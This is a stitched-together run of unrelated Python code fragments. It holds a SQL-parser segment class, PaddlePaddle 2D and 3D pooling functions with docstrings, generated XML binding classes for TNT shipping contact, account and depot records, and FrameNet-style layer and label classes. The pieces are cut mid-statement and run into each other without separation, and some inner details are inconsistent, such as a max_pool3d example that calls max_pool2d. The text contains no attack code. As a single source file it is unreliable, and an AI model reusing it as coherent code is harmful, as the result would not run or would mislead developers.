        todo_buffer = list(self.segments)
        running_pos = self.pos_marker

        while True:
            if len(todo_buffer) == 0:
                # We're done.
                break
            else:
                # Get the first off the buffer
                seg = todo_buffer.pop(0)

                # We'll preserve statement indexes so we should keep track of that.
                # When recreating, we use the DELTA of the index so that's what matter...
idx = seg.pos_marker.statement_index - running_pos.statement_index if seg.is_meta: # It's a meta segment, just update the position seg = seg.__class__( pos_marker=running_pos ) elif len(seg.segments) > 0: # It's a compound segment, so keep track of it's children child_segs = seg.segments # Create a new segment of the same type with the new position seg = seg.__class__( segments=child_segs, pos_marker=running_pos ) # Realign the children of that class seg = seg.realign() else: # It's a raw segment... # Create a new segment of the same type with the new position seg = seg.__class__( raw=seg.raw, pos_marker=running_pos ) # Update the running position with the content of that segment running_pos = running_pos.advance_by( raw=seg.raw, idx=idx ) # Add the buffer to my new segment seg_buffer.append(seg) # Create a new version of this class with the new details return self.__class__( segments=tuple(seg_buffer), pos_marker=self.pos_marker ) class RawSegment(BaseSegment): """This is a segment without any subsegments.""" type = 'raw' _is_code = False _is_comment = False _template = '<unset>' _case_sensitive = False _raw_upper = None @property def is_expandable(self): """Return true if it is meaningful to call `expand` on this segment.""" return False @property def is_code(self): """Return True if this segment is code.""" return self._is_code @property def is_comment(self): """Return True if this segment is a comment.""" return self._is_comment def __init__(self, raw, pos_marker): self._raw = raw self._raw_upper = raw.upper() # pos marker is required here self.pos_marker = pos_marker @property def raw_upper(self): """Make an uppercase string from the segments of this segment.""" return self._raw_upper def iter_raw_seg(self): """Iterate raw segments, mostly for searching.""" yield self @property def segments(self): """Return an empty list of child segments. This is in case something tries to iterate on this segment. 
""" return [] def raw_list(self): """Return a list of the raw content of this segment.""" return [self.raw] def _reconstruct(self): """Return a string of the raw content of this segment.""" return self._raw def __repr__(self): return "<{0}: ({1}) {2!r}>".format( self.__class__.__name__, self.pos_marker, self.raw) def stringify(self, ident=0, tabsize=4, pos_idx=60, raw_idx=80, code_only=False): """Use indentation to render this segment and it's children as a string.""" preface = self._preface(ident=ident, tabsize=tabsize, pos_idx=pos_idx, raw_idx=raw_idx) return preface + '\n' def _suffix(self): """Return any extra output required at the end when logging. NB Override this for specific subclassesses if we want extra output. """ return "{0!r}".format(self.raw) @classmethod def make(cls, template, case_sensitive=False, name=None, **kwargs): """Make a subclass of the segment using a method.""" # Let's deal with the template first if case_sensitive: _template = template else: _template = template.upper() # Use the name if provided otherwise default to the template name = name or _template # Now lets make the classname (it indicates the mother class for clarity) classname = "{0}_{1}".format(name, cls.__name__) # This is the magic, we generate a new class! SORCERY newclass = type(classname, (cls, ), dict(_template=_template, _case_sensitive=case_sensitive,
'x', ['float32', 'float64'], 'avg_pool2d') kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size') if stride is None: stride = kernel_size else: stride = utils.convert_to_list(stride, 2, 'pool_stride') padding_algorithm = "EXPLICIT" if isinstance(padding, str): padding = padding.upper() if padding not in ["SAME", "VALID"]: raise ValueError( "Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'." % str(padding)) if padding == "VALID": padding_algorithm = "VALID" padding = [0, 0] if ceil_mode != False: raise ValueError( "When Attr(pool_padding) is \"VALID\", Attr(ceil_mode) must be False. " "Received ceil_mode: True.") elif padding == "SAME": padding_algorithm = "SAME" padding = [0, 0] if data_format not in ["NCHW", "NHWC"]: raise ValueError( "Attr(data_format) should be 'NCHW' or 'NHWC'. Received " "Attr(data_format): %s." % str(data_format)) pool_padding = update_padding2d(padding, data_format) if in_dygraph_mode(): output = core.ops.pool2d( x, 'pooling_type', 'avg', 'ksize', kernel_size, 'global_pooling', False, 'padding_algorithm', padding_algorithm, 'strides', stride, 'paddings', pool_padding, 'use_cudnn', True, 'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', not count_include_pad, 'data_format', data_format) if divisor_override is None: return output else: check_instance(divisor_override, "divisor_override") return output * (kernel_size[0] * kernel_size[1]) / divisor_override op_type = 'pool2d' helper = LayerHelper(op_type, **locals()) dtype = helper.input_dtype() pool_out = helper.create_variable_for_type_inference(dtype) helper.append_op( type=op_type, inputs={"X": x}, outputs={"Out": pool_out}, attrs={ "pooling_type": "avg", "ksize": kernel_size, "global_pooling": False, "strides": stride, "paddings": pool_padding, "padding_algorithm": padding_algorithm, "use_cudnn": True, "ceil_mode": ceil_mode, "use_mkldnn": False, "exclusive": not count_include_pad, "data_format": data_format, }) if divisor_override is None: return 
pool_out else: check_instance(divisor_override, "divisor_override") return pool_out * (kernel_size[0] * kernel_size[1]) / divisor_override def max_pool3d(x, kernel_size, stride=None, padding=0, return_indices=False, ceil_mode=False, data_format="NCDHW", name=None): """ This operation applies 3D max pooling over input features based on the input, and kernel_size, stride, padding parameters. Input(X) and Output(Out) are in NCDHW format, where N is batch size, C is the number of channels, H is the height of the feature, D is the depth of the feature, and W is the width of the feature. Example: Input: X shape: $(N, C, D_{in}, H_{in}, W_{in})$ Attr: kernel_size: ksize Output: Out shape: $(N, C, D_{out}, H_{out}, W_{out})$ $$ \text{out}(N_i, C_j, d, h, w) ={} & \max_{k=0, \ldots, ksize[0]-1} \max_{m=0, \ldots, ksize[1]-1} \max_{n=0, \ldots, ksize[2]-1} \\ & \text{input}(N_i, C_j, \text{stride[0]} \times d + k, \text{stride[1]} \times h + m, \text{stride[2]} \times w + n) $$ Args: x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` or `"NDHWC"`, where `N` is batch size, `C` is the number of channels, `D` is the depth of the feature, `H` is the height of the feature, and `W` is the width of the feature. kernel_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain three integers, (pool_size_Depth, pool_size_Height, pool_size_Width). Otherwise, the pool kernel size will be the cube of an int. stride (string|int|list|tuple)): The pool padding. If `pool_padding` is a string, either 'VALID' or 'SAME' which is the padding algorithm. If pool stride size is a tuple or list, it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`. Otherwise, the pool stride size will be a cube of an int. padding (int|list|tuple): The pool padding size. 
If pool padding size is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or `[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form `[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`. when `data_format` is `"NDHWC"`, `pool_padding` can be in the form `[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`. ceil_mode (bool): ${ceil_mode_comment} return_indices (bool): Whether to return the max indices along with the outputs. data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`. The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of: `[batch_size, input_channels, input_depth, input_height, input_width]`. name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default. Returns: Tensor: The output tensor of pooling result. The data type is same as input tensor. Raises: ValueError: If `padding` is a string, but not "SAME" or "VALID". ValueError: If `padding` is "VALID", but `ceil_mode` is True. ShapeError: If the output's shape calculated is not greater than 0. Examples: .. 
code-block:: python import paddle import paddle.nn.functional as F import numpy as np paddle.disable_static() # max pool3d input = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32)) output = F.max_pool2d(input, kernel_size=2, stride=2, padding=0) output.shape [1, 3, 16, 16, 16] # for return_indices=True input = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32, 32, 32]).astype(np.float32)) output, max_indices = paddle.nn.functional.max_pool3d(input, kernel_size = 2, stride = 2, padding=0, return_indices=True) # output.shape [None, 3, 16, 16, 16], max_indices.shape [None, 3, 16, 16, 16], """ check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool3d') kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size') if stride is None: stride = kernel_size else: stride = utils.convert_to_list(stride, 3, 'pool_stride') padding_algorithm = "EXPLICIT" if isinstance(padding, str): padding = padding.upper() if padding not in ["SAME", "VALID"]: raise ValueError( "Unknown Attr(pool_padding): '%s'. It can only be 'SAME' or 'VALID'." % str(padding)) if padding == "VALID": padding_algorithm = "VALID" padding = [0, 0, 0] if ceil_mode != False: raise ValueError( "When Attr(pool_padding) is \"VALID\", ceil_mode must be False. " "Received ceil_mode: True.") elif padding == "SAME": padding_algorithm = "SAME" padding = [0, 0, 0] if data_format not in ["NCDHW", "NDHWC"]: raise ValueError( "Attr(data_format) should be 'NCDHW' or 'NDHWC'. 
Received " "Attr(data_format): %s" % str(data_format)) padding = update_padding3d(padding, data_format) if in_dygraph_mode(): output = core.ops.max_pool3d_with_index( x, 'pooling_type', 'max', 'ksize', kernel_size, 'strides', stride, 'paddings', padding, 'global_pooling', False, 'padding_algorithm', padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', True, 'data_format', data_format) return output if return_indices else output[0] op_type = "max_pool3d_with_index" helper = LayerHelper(op_type, **locals()) dtype = helper.input_dtype() pool_out = helper.create_variable_for_type_inference(dtype) mask = helper.create_variable_for_type_inference(dtype) outputs = {"Out": pool_out, "Mask": mask} helper.append_op( type=op_type, inputs={"X": x}, outputs=outputs, attrs={ "pooling_type": 'max', "ksize": kernel_size, "global_pooling": False, "strides": stride, "paddings": padding, "padding_algorithm": padding_algorithm, "use_cudnn": True, "ceil_mode": ceil_mode, "use_mkldnn": False, "exclusive": False, "data_format": data_format, }) return (pool_out, mask) if return_indices else pool_out def avg_pool3d(x, kernel_size, stride=None, padding=0, ceil_mode=False, count_include_pad=False, divisor_override=None, data_format="NCDHW", name=None): """ This operation applies 3D max pooling over input features based on the input, and kernel_size, stride, padding parameters. Input(X) and Output(Out) are in NCDHW format, where N is batch size, C is the number of channels, H is the height of the feature, D is the depth of the feature, and W is the width of the feature. Args: input (Tensor): The input tensor of pooling operator, which is a 5-D tensor with shape [N, C, D, H, W], where `N` is batch size, `C` is the number of channels, `D` is the depth of the feature, `H` is the height of the feature, and `W` is the width of the feature. kernel_size (int|list|tuple): The pool kernel size. 
If pool kernel size is a tuple or list, it must contain three integers, (pool_size_Depth, pool_size_Height, pool_size_Width). Otherwise, the pool kernel size will be the cube of an int. stride (string|int|list|tuple)): The pool padding. If `pool_padding` is a string, either 'VALID' or 'SAME' which is the padding algorithm. If pool stride size is a tuple or list, it must contain three integers, `[stride_Depth, stride_Height, stride_Width]`. Otherwise, the pool stride size will be a cube of an int. padding (int|list|tuple): The pool padding size. If pool padding size is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or `[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form `[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`. when `data_format` is `"NDHWC"`, `pool_padding` can be in the form `[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`. ceil_mode (bool): ${ceil_mode_comment} count_include_pad (bool): Whether to exclude padding points in average pooling mode, default is True. divisor_override (int|float) if specified, it will be used as divisor, otherwise kernel_size will be used. Default None. data_format (string): The data format
self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMaxLength30' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.name is not None or self.telephoneNumber is not None or self.emailAddress is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='contactType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('contactType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if self.original_tagname_ is not None and name_ == 'contactType': name_ = self.original_tagname_ if UseCapturedNS_ and self.ns_prefix_: namespaceprefix_ = self.ns_prefix_ + ':' showIndent(outfile, level, pretty_print) outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) already_processed = set() self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='contactType') if self.hasContent_(): outfile.write('>%s' % (eol_, )) self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='contactType', pretty_print=pretty_print) showIndent(outfile, level, pretty_print) outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_)) else: outfile.write('/>%s' % (eol_, )) def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='contactType'): pass def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='contactType', fromsubclass_=False, pretty_print=True): if pretty_print: eol_ = '\n' else: eol_ = '' if self.name is not None: namespaceprefix_ = self.name_nsprefix_ + ':' if (UseCapturedNS_ and self.name_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%sname>%s</%sname>%s' % (namespaceprefix_ , 
self.gds_encode(self.gds_format_string(quote_xml(self.name), input_name='name')), namespaceprefix_ , eol_)) if self.telephoneNumber is not None: namespaceprefix_ = self.telephoneNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.telephoneNumber_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%stelephoneNumber>%s</%stelephoneNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.telephoneNumber), input_name='telephoneNumber')), namespaceprefix_ , eol_)) if self.emailAddress is not None: namespaceprefix_ = self.emailAddress_nsprefix_ + ':' if (UseCapturedNS_ and self.emailAddress_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%semailAddress>%s</%semailAddress>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.emailAddress), input_name='emailAddress')), namespaceprefix_ , eol_)) def build(self, node, gds_collector_=None): self.gds_collector_ = gds_collector_ if SaveElementTreeNode: self.gds_elementtree_node_ = node already_processed = set() self.ns_prefix_ = node.prefix self.buildAttributes(node, node.attrib, already_processed) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_) return self def buildAttributes(self, node, attrs, already_processed): pass def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None): if nodeName_ == 'name': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'name') value_ = self.gds_validate_string(value_, node, 'name') self.name = value_ self.name_nsprefix_ = child_.prefix # validate type stringMaxLength30 self.validate_stringMaxLength30(self.name) elif nodeName_ == 'telephoneNumber': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'telephoneNumber') value_ = self.gds_validate_string(value_, node, 'telephoneNumber') self.telephoneNumber = value_ 
self.telephoneNumber_nsprefix_ = child_.prefix # validate type stringMaxLength30 self.validate_stringMaxLength30(self.telephoneNumber) elif nodeName_ == 'emailAddress': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'emailAddress') value_ = self.gds_validate_string(value_, node, 'emailAddress') self.emailAddress = value_ self.emailAddress_nsprefix_ = child_.prefix # end class contactType class accountType(GeneratedsSuper): """Information about a TNT account which includes the account number and country code.""" __hash__ = GeneratedsSuper.__hash__ subclass = None superclass = None def __init__(self, accountNumber=None, accountCountry=None, gds_collector_=None, **kwargs_): self.gds_collector_ = gds_collector_ self.gds_elementtree_node_ = None self.original_tagname_ = None self.parent_object_ = kwargs_.get('parent_object_') self.ns_prefix_ = None self.accountNumber = accountNumber self.validate_stringMaxLength10(self.accountNumber) self.accountNumber_nsprefix_ = None self.accountCountry = accountCountry self.validate_stringMinLength2MaxLength2(self.accountCountry) self.accountCountry_nsprefix_ = None def factory(*args_, **kwargs_): if CurrentSubclassModule_ is not None: subclass = getSubclassFromModule_( CurrentSubclassModule_, accountType) if subclass is not None: return subclass(*args_, **kwargs_) if accountType.subclass: return accountType.subclass(*args_, **kwargs_) else: return accountType(*args_, **kwargs_) factory = staticmethod(factory) def get_ns_prefix_(self): return self.ns_prefix_ def set_ns_prefix_(self, ns_prefix): self.ns_prefix_ = ns_prefix def get_accountNumber(self): return self.accountNumber def set_accountNumber(self, accountNumber): self.accountNumber = accountNumber def get_accountCountry(self): return self.accountCountry def set_accountCountry(self, accountCountry): self.accountCountry = accountCountry def validate_stringMaxLength10(self, value): result = True # Validate type stringMaxLength10, a restriction on xsd:string. 
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 10: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMaxLength10' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def validate_stringMinLength2MaxLength2(self, value): result = True # Validate type stringMinLength2MaxLength2, a restriction on xsd:string. if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 2: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMinLength2MaxLength2' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False if len(value) < 2: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minLength restriction on stringMinLength2MaxLength2' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.accountNumber is not None or self.accountCountry is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='accountType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('accountType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if 
self.original_tagname_ is not None and name_ == 'accountType': name_ = self.original_tagname_ if UseCapturedNS_ and self.ns_prefix_: namespaceprefix_ = self.ns_prefix_ + ':' showIndent(outfile, level, pretty_print) outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) already_processed = set() self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='accountType') if self.hasContent_(): outfile.write('>%s' % (eol_, )) self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='accountType', pretty_print=pretty_print) showIndent(outfile, level, pretty_print) outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_)) else: outfile.write('/>%s' % (eol_, )) def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='accountType'): pass def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='accountType', fromsubclass_=False, pretty_print=True): if pretty_print: eol_ = '\n' else: eol_ = '' if self.accountNumber is not None: namespaceprefix_ = self.accountNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.accountNumber_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%saccountNumber>%s</%saccountNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.accountNumber), input_name='accountNumber')), namespaceprefix_ , eol_)) if self.accountCountry is not None: namespaceprefix_ = self.accountCountry_nsprefix_ + ':' if (UseCapturedNS_ and self.accountCountry_nsprefix_) else '' showIndent(outfile, level, pretty_print) outfile.write('<%saccountCountry>%s</%saccountCountry>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.accountCountry), input_name='accountCountry')), namespaceprefix_ , eol_)) def build(self, node, gds_collector_=None): self.gds_collector_ = gds_collector_ if SaveElementTreeNode: self.gds_elementtree_node_ = node 
already_processed = set() self.ns_prefix_ = node.prefix self.buildAttributes(node, node.attrib, already_processed) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_) return self def buildAttributes(self, node, attrs, already_processed): pass def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None): if nodeName_ == 'accountNumber': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'accountNumber') value_ = self.gds_validate_string(value_, node, 'accountNumber') self.accountNumber = value_ self.accountNumber_nsprefix_ = child_.prefix # validate type stringMaxLength10 self.validate_stringMaxLength10(self.accountNumber) elif nodeName_ == 'accountCountry': value_ = child_.text value_ = self.gds_parse_string(value_, node, 'accountCountry') value_ = self.gds_validate_string(value_, node, 'accountCountry') self.accountCountry = value_ self.accountCountry_nsprefix_ = child_.prefix # validate type stringMinLength2MaxLength2 self.validate_stringMinLength2MaxLength2(self.accountCountry) # end class accountType class depotType(GeneratedsSuper): """Details relating to a TNT depot which could be the origin, destination or transit depot on the route calculated by TNT to deliver a consignment.""" __hash__ = GeneratedsSuper.__hash__ subclass = None superclass = None def __init__(self, depotCode=None, gds_collector_=None, **kwargs_): self.gds_collector_ = gds_collector_ self.gds_elementtree_node_ = None self.original_tagname_ = None self.parent_object_ = kwargs_.get('parent_object_') self.ns_prefix_ = None self.depotCode = depotCode self.validate_stringMinLength3MaxLength3(self.depotCode) self.depotCode_nsprefix_ = None def factory(*args_, **kwargs_): if CurrentSubclassModule_ is not None: subclass = getSubclassFromModule_( CurrentSubclassModule_, depotType) if subclass is not None: return subclass(*args_, **kwargs_) if depotType.subclass: 
return depotType.subclass(*args_, **kwargs_) else: return depotType(*args_, **kwargs_) factory = staticmethod(factory) def get_ns_prefix_(self): return self.ns_prefix_ def set_ns_prefix_(self, ns_prefix): self.ns_prefix_ = ns_prefix def get_depotCode(self): return self.depotCode def set_depotCode(self, depotCode): self.depotCode = depotCode def validate_stringMinLength3MaxLength3(self, value): result = True # Validate type stringMinLength3MaxLength3, a restriction on xsd:string. if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None: if not isinstance(value, str): lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, }) return False if len(value) > 3: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxLength restriction on stringMinLength3MaxLength3' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False if len(value) < 3: lineno = self.gds_get_node_lineno_() self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minLength restriction on stringMinLength3MaxLength3' % {"value" : encode_str_2_3(value), "lineno": lineno} ) result = False return result def hasContent_(self): if ( self.depotCode is not None ): return True else: return False def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='depotType', pretty_print=True): imported_ns_def_ = GenerateDSNamespaceDefs_.get('depotType') if imported_ns_def_ is not None: namespacedef_ = imported_ns_def_ if pretty_print: eol_ = '\n' else: eol_ = '' if self.original_tagname_ is not None and name_ == 'depotType': name_ = self.original_tagname_
name) self.rank = _cast(None, rank) if label is None: self.label = [] else: self.label = label def factory(*args_, **kwargs_): if layerType.subclass: return layerType.subclass(*args_, **kwargs_) else: return layerType(*args_, **kwargs_) factory = staticmethod(factory) def get_label(self): return self.label def set_label(self, label): self.label = label def add_label(self, value): self.label.append(value) def insert_label(self, index, value): self.label[index] = value def get_name(self): return self.name def set_name(self, name): self.name = name def get_rank(self): return self.rank def set_rank(self, rank): self.rank = rank def export(self, outfile, level, namespace_='fn:', name_='layerType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, name_='layerType') if self.hasContent_(): outfile.write('>\n') self.exportChildren(outfile, level + 1, namespace_, name_) showIndent(outfile, level) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='layerType'): if self.name is not None and 'name' not in already_processed: already_processed.append('name') outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), )) if self.rank is not None and 'rank' not in already_processed: already_processed.append('rank') outfile.write(' rank=%s' % (quote_attrib(self.rank), )) def exportChildren(self, outfile, level, namespace_='fn:', name_='layerType', fromsubclass_=False): for label_ in self.label: label_.export(outfile, level, namespace_, name_='label') def hasContent_(self): if ( self.label ): return True else: return False def exportLiteral(self, outfile, level, name_='layerType'): level += 1 self.exportLiteralAttributes(outfile, level, [], name_) if self.hasContent_(): 
self.exportLiteralChildren(outfile, level, name_) def exportLiteralAttributes(self, outfile, level, already_processed, name_): if self.name is not None and 'name' not in already_processed: already_processed.append('name') showIndent(outfile, level) outfile.write('name = "%s",\n' % (self.name,)) if self.rank is not None and 'rank' not in already_processed: already_processed.append('rank') showIndent(outfile, level) outfile.write('rank = %s,\n' % (self.rank,)) def exportLiteralChildren(self, outfile, level, name_): showIndent(outfile, level) outfile.write('label=[\n') level += 1 for label_ in self.label: showIndent(outfile, level) outfile.write('model_.labelType(\n') label_.exportLiteral(outfile, level, name_='labelType') showIndent(outfile, level) outfile.write('),\n') level -= 1 showIndent(outfile, level) outfile.write('],\n') def build(self, node): self.buildAttributes(node, node.attrib, []) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_) def buildAttributes(self, node, attrs, already_processed): value = attrs.get('name') if value is not None and 'name' not in already_processed: already_processed.append('name') self.name = value value = attrs.get('rank') if value is not None and 'rank' not in already_processed: already_processed.append('rank') self.rank = value def buildChildren(self, child_, node, nodeName_, fromsubclass_=False): if nodeName_ == 'label': obj_ = labelType.factory() obj_.build(child_) self.label.append(obj_) # end class layerType class labelType(GeneratedsSuper): subclass = None superclass = None def __init__(self, itype=None, name=None, bgColor=None, feID=None, start=None, end=None, cBy=None, fgColor=None, valueOf_=None): self.itype = _cast(None, itype) self.name = _cast(None, name) self.bgColor = _cast(None, bgColor) self.feID = _cast(int, feID) self.start = _cast(None, start) self.end = _cast(None, end) self.cBy = _cast(None, cBy) self.fgColor = _cast(None, fgColor) 
self.valueOf_ = valueOf_ def factory(*args_, **kwargs_): if labelType.subclass: return labelType.subclass(*args_, **kwargs_) else: return labelType(*args_, **kwargs_) factory = staticmethod(factory) def get_itype(self): return self.itype def set_itype(self, itype): self.itype = itype def get_name(self): return self.name def set_name(self, name): self.name = name def get_bgColor(self): return self.bgColor def set_bgColor(self, bgColor): self.bgColor = bgColor def get_feID(self): return self.feID def set_feID(self, feID): self.feID = feID def get_start(self): return self.start def set_start(self, start): self.start = start def get_end(self): return self.end def set_end(self, end): self.end = end def get_cBy(self): return self.cBy def set_cBy(self, cBy): self.cBy = cBy def get_fgColor(self): return self.fgColor def set_fgColor(self, fgColor): self.fgColor = fgColor def get_valueOf_(self): return self.valueOf_ def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_ def export(self, outfile, level, namespace_='fn:', name_='labelType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, name_='labelType') if self.hasContent_(): outfile.write('>') outfile.write(self.valueOf_) self.exportChildren(outfile, level + 1, namespace_, name_) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='labelType'): if self.itype is not None and 'itype' not in already_processed: already_processed.append('itype') outfile.write(' itype=%s' % (self.gds_format_string(quote_attrib(self.itype).encode(ExternalEncoding), input_name='itype'), )) if self.name is not None and 'name' not in already_processed: already_processed.append('name') outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), 
input_name='name'), )) if self.bgColor is not None and 'bgColor' not in already_processed: already_processed.append('bgColor') outfile.write(' bgColor=%s' % (quote_attrib(self.bgColor), )) if self.feID is not None and 'feID' not in already_processed: already_processed.append('feID') outfile.write(' feID="%s"' % self.gds_format_integer(self.feID, input_name='feID')) if self.start is not None and 'start' not in already_processed: already_processed.append('start') outfile.write(' start=%s' % (quote_attrib(self.start), )) if self.end is not None and 'end' not in already_processed: already_processed.append('end') outfile.write(' end=%s' % (quote_attrib(self.end), )) if self.cBy is not None and 'cBy' not in already_processed: already_processed.append('cBy') outfile.write(' cBy=%s' % (self.gds_format_string(quote_attrib(self.cBy).encode(ExternalEncoding), input_name='cBy'), )) if self.fgColor is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') outfile.write(' fgColor=%s' % (quote_attrib(self.fgColor), )) def exportChildren(self, outfile, level, namespace_='fn:', name_='labelType', fromsubclass_=False): pass def hasContent_(self): if ( self.valueOf_ ): return True else: return False def exportLiteral(self, outfile, level, name_='labelType'): level += 1 self.exportLiteralAttributes(outfile, level, [], name_) if self.hasContent_(): self.exportLiteralChildren(outfile, level, name_) showIndent(outfile, level) outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,)) def exportLiteralAttributes(self, outfile, level, already_processed, name_): if self.itype is not None and 'itype' not in already_processed: already_processed.append('itype') showIndent(outfile, level) outfile.write('itype = "%s",\n' % (self.itype,)) if self.name is not None and 'name' not in already_processed: already_processed.append('name') showIndent(outfile, level) outfile.write('name = "%s",\n' % (self.name,)) if self.bgColor is not None and 'bgColor' not in 
